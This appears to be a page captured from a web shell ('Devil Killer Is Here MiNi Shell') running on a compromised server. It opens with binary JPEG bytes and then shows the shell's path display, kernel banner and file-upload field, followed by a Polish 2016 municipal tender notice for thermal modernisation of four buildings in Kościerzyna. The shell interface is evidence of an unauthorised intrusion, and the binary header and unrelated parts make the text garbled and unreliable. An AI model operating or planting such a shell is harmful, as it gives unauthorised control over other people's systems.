JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160726/159065-N-2016.html

<p class="kh_header"><b>Kościerzyna: Termomodernizacja budynków w Kościerzynie w ramach zadania pn. Kawka 
w Kościerzynie. Ograniczenie niskiej emisji poprzez kogenerację i termomodernizację budynków - CZĘŚĆ I: budynek przy ul. Kaplicznej 9, CZĘŚĆ II: budynek przy ul. Młyńskiej 6, CZĘŚĆ III: budynek przy ul. Traugutta 4, CZĘŚĆ IV: budynek przy ul. Wybickiego 8</b><br>
<b>Numer ogłoszenia: 159065 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kościerzyna , ul. 3 Maja 9A, 83-400 Kościerzyna, woj. pomorskie, tel. 58 6802300, faks 58 6802320.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koscierzyna.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków w Kościerzynie w ramach zadania pn. Kawka 
w Kościerzynie. Ograniczenie niskiej emisji poprzez kogenerację i termomodernizację budynków - CZĘŚĆ I: budynek przy ul. Kaplicznej 9, CZĘŚĆ II: budynek przy ul. Młyńskiej 6, CZĘŚĆ III: budynek przy ul. Traugutta 4, CZĘŚĆ IV: budynek przy ul. Wybickiego 8.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zakłada wykonanie prac termomodernizacyjnych w budynkach zlokalizowanych w Kościerzynie odpowiednio: 
I.budynek przy ul. Kaplicznej 9:
-ocieplenie ścian zewnętrznych
-ocieplenie dachu
-wymiana stolarki okiennej i drzwiowej, montaż nawiewników
-wykonanie węzła c.o. i c.w.u.
-wykonanie instalacji c.o. 
-wykonanie instalacji c.w.u.
-wykonanie przyłącza do miejskiej sieci ciepłowniczej
II.budynek przy ul. Młyńskiej 6:
-ocieplenie ścian zewnętrznych 
-ocieplenie dachu
-wymiana stolarki okiennej i drzwiowej, montaż nawiewników
-wykonanie węzła c.o. i c.w.u.
-wykonanie instalacji  c.o. 
-wykonanie instalacji c.w.u.
-wykonanie instalacji solarnej 
III.budynek przy ul. Traugutta 4:
-ocieplenie ścian zewnętrznych
-ocieplenie stropodachu
-wymiana stolarki okiennej i drzwiowej, montaż nawiewników
-wykonanie węzła c.o. i c.w.u.
-wykonanie instalacji  c.o. 
-wykonanie instalacji c.w.u.
-wykonanie instalacji solarnej
IV.budynek przy ul. Wybickiego 8:
-ocieplenie ścian zewnętrznych 
-ocieplenie stropodachu
-wymiana stolarki okiennej i drzwiowej, montaż nawiewników
-wykonanie węzła c.o. i c.w.u.
-wykonanie instalacji  c.o. 
-wykonanie instalacji c.w.u.
-wykonanie instalacji solarnej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje ewentualne udzielenie zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego i zgodnych z zamówieniem podstawowym (art. 67 ust 1 pkt 6 ustawy Prawo zamówień publicznych)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.33.00.00-9, 45.45.30.00-7, 45.26.12.10-9, 45.42.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca ubiegający się o udzielenie zamówienia jest zobowiązany do wniesienia wadium w wysokości:
a)Część I - 10.000 zł (słownie złotych: dziesięć tysięcy),
b)Część II - 5.500 zł (słownie złotych: pięć tysięcy pięćset),
c)Część III - 6.100 zł (słownie złotych: sześć tysięcy sto),
d)Część IV - 11.200 zł (słownie złotych: jedenaście tysięcy dwieście).
przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca przedłoży oświadczenie 
o spełnianiu warunków udziału w postępowaniu - wypełnione i podpisane, wg wzoru formularza 3.1 stanowiącego załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA CZĘŚCI I - Wykonawca zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane porównywalne rodzajowo z niniejszym zamówieniem, polegające na termomodernizacji obiektów
obejmujące roboty dociepleniowe i instalacyjne branży sanitarnej o wartości nie mniejszej niż 300.000 zł brutto każda,
DLA CZĘŚCI II - Wykonawca zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane porównywalne rodzajowo z niniejszym zamówieniem, polegające na termomodernizacji obiektów
obejmujące roboty dociepleniowe i instalacyjne branży sanitarnej o wartości nie mniejszej niż 200.000 zł brutto każda,
DLA CZĘŚCI III - Wykonawca zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane porównywalne rodzajowo z niniejszym zamówieniem, polegające na termomodernizacji obiektów
obejmujące roboty dociepleniowe i instalacyjne branży sanitarnej o wartości nie mniejszej niż 200.000 zł brutto każda,
DLA CZĘŚCI IV - Wykonawca zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane porównywalne rodzajowo z niniejszym zamówieniem, polegające na termomodernizacji obiektów
obejmujące roboty dociepleniowe i instalacyjne branży sanitarnej o wartości nie mniejszej niż 300.000 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony, kiedy wykonawca przedłoży oświadczenie 
o spełnianiu warunków udziału w postępowaniu - wypełnione i podpisane, wg wzoru formularza 3.1 stanowiącego załącznik do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA CZĘŚCI I, II, III, IV - Wykonawca winien na czas realizacji zamówienia dysponować osobami zapewniającymi realizację zamówienia oraz posiadającymi doświadczenie i kwalifikacje niezbędne do wykonania zamówienia, w tym:
1.Kierownik budowy branży konstrukcyjno-budowlanej - winien posiadać:
a)ważne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów oraz
b)doświadczenie co najmniej 3 lata pracy w kierowaniu robotami budowlanymi w powyższej specjalności,
2.Kierownik robót branży sanitarnej - winien posiadać:
a)ważne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej wydanych przepisów oraz 
b)doświadczenie co najmniej 3 lat pracy w kierowaniu robotami budowlanymi w powyższej specjalności
Dot. wszystkich części: 
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanego doświadczenia, kwalifikacji i uprawnień budowlanych, dopuszcza odpowiadające im doświadczenie, kwalifikacje i uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im doświadczenie, kwalifikacje i uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (Dz. U. z 2010 r. nr 243, poz. 1623) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394).
Dopuszcza się łączenie stanowisk w przypadku posiadania przez jedną osobę uprawnień więcej niż jednej branży.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DLA CZĘŚCI I - posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 300.000zł,
DLA CZĘŚCI II - posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 200.000zł,
DLA CZĘŚCI III - posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 200.000zł,
DLA CZĘŚCI IV - posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 300.000zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Na podstawie §1 ust. 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane Zamawiający wymaga, aby Wykonawca w celu wykazania spełniania warunku udziału 
w postępowaniu w zakresie posiadania wymaganej wiedzy i doświadczenia załączył do oferty wykaz robót budowlanych oraz dowody, o których mowa wyżej, jedynie w takim zakresie, jaki jest niezbędny do potwierdzenia wykazania spełniania przez Wykonawcę warunku udziału w postępowaniu określonego przez Zamawiającego w pkt 7.1.2) SIWZ, tj.: 
DLA CZĘŚCI I - Wykonawca zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane porównywalne rodzajowo z niniejszym zamówieniem, polegające na termomodernizacji obiektów
obejmujące roboty dociepleniowe i instalacyjne branży sanitarnej o wartości nie mniejszej niż 300.000 zł brutto każda,
DLA CZĘŚCI II - Wykonawca zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane porównywalne rodzajowo z niniejszym zamówieniem, polegające na termomodernizacji obiektów
obejmujące roboty dociepleniowe i instalacyjne branży sanitarnej o wartości nie mniejszej niż 200.000 zł brutto każda,
DLA CZĘŚCI III - Wykonawca zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane porównywalne rodzajowo z niniejszym zamówieniem, polegające na termomodernizacji obiektów
obejmujące roboty dociepleniowe i instalacyjne branży sanitarnej o wartości nie mniejszej niż 200.000 zł brutto każda,
DLA CZĘŚCI IV - Wykonawca zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane porównywalne rodzajowo z niniejszym zamówieniem, polegające na termomodernizacji obiektów
obejmujące roboty dociepleniowe i instalacyjne branży sanitarnej o wartości nie mniejszej niż 300.000 zł brutto każda;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - stosuje się do przepisów Rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 poz. 231) - jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.1.	Zamawiający ma prawo polecać Wykonawcy na piśmie, w okolicznościach opisanych w pkt 1.5:
a)wykonanie rozwiązań zamiennych lub robót dodatkowych w stosunku do projektowanych w Dokumentacji projektowej mieszczących się w przedmiocie zamówienia podstawowego,
b)zwiększenie lub zmniejszenie ilości robót objętych Kosztorysem Ofertowym,
c)pominięcie jakichkolwiek robót,
d)wykonanie nieprzewidzianych robót, niezbędnych do zakończenia przedmiotu umowy,
e)dokonanie zmiany kolejności wykonania robót, 
1.2.	Wydane przez Zamawiającego polecenia, o których mowa w ust. 1, nie unieważniają w jakiejkolwiek mierze umowy, ale skutki tych poleceń mogą stanowić podstawę do zmiany - na wniosek Wykonawcy terminu zakończenia robót, o którym mowa w § 3 ust. 1 umowy oraz wynagrodzenia, o którym mowa w § 5 ust. 1 umowy, jednakże każda zmiana ryczałtowego wynagrodzenia wymaga pisemnego aneksu do umowy pod rygorem nieważności; zmiana wynagrodzenia będzie skalkulowana zgodnie z zasadami określonymi w § 8 umowy.
1.3.	Wykonawca nie wprowadzi jakichkolwiek zmian bez pisemnego polecenia lub zgody Zamawiającego.
1.4.	Zmiany wynikające z poleceń, o których mowa w ust. 1, muszą być uwzględnione przez Wykonawcę w uaktualnionym harmonogramie rzeczowo - finansowym.
1.5.	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień zawartej umowy  dotyczących: 
1) zmiany sposobu wykonania robót lub ich zakresu w przypadku:
a)wykonywania na polecenie Zamawiającego robót dodatkowych lub zamiennych mieszczących się w przedmiocie zamówienia podstawowego, 
b)zwiększenia lub zmniejszenia zakresów rzeczowych elementów robót ujętych w Kosztorysie Ofertowym wskutek polecenia Zamawiającego mieszczących się w przedmiocie zamówienia podstawowego,
c)wykonania na polecenie Zamawiającego robót opisanych w projekcie budowlanym, zaś pominiętych w przedmiarach robót lub w projektach wykonawczych, jak również robót przewidzianych w projektach wykonawczych a pominiętych w przedmiarach robót,
2) zmiany wysokości wynagrodzenia wykonawcy na skutek: 
a)ustawowej zmiany stawki podatku VAT, 
b)zmiany sposobu wykonania robót lub zmiany ich zakresu, o którym mowa w pkt 1.5 pkt 1), 
3) zmiany przedstawiciela ze strony zamawiającego, zmiany osoby odpowiedzialnej po stronie wykonawcy za realizację przedmiotu zamówienia, zmiany osób uczestniczących w wykonywaniu zamówienia po stronie Wykonawcy i osób nadzorujących wykonanie zamówienia po stronie Zamawiającego,
4) zmiany w danych podmiotowych oraz rachunku bankowym wykonawcy,
5) zmiany terminu realizacji przedmiotu zamówienia na pisemny wniosek Wykonawcy w przypadku: 
a) ze względu na wykonanie prac wynikających z okoliczności opisanych powyżej w  pkt 1.5 pkt 1)
b) wykonywania przez Wykonawcę zamówień uzupełniających lub zamówień dodatkowych realizowanych na podstawie odrębnej umowy w trybie ustawy Pzp, 
c) wydłużenia terminu zakończenia realizacji umowy na pisemny wniosek Wykonawcy w przypadku wystąpienia niesprzyjających warunków atmosferycznych.
1.6.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.koscierzyna.gda.pl/portal?id=406680<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kościerzyna, ul. 3 Maja 9A, 83-400 Kościerzyna, pok. 62, IV piętro bud. urzędu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2016 godzina 10:00, miejsce: Urząd Miasta Kościerzyna, ul. 3 Maja 9A, 83-400 Kościerzyna, pok. 62, IV piętro bud. urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





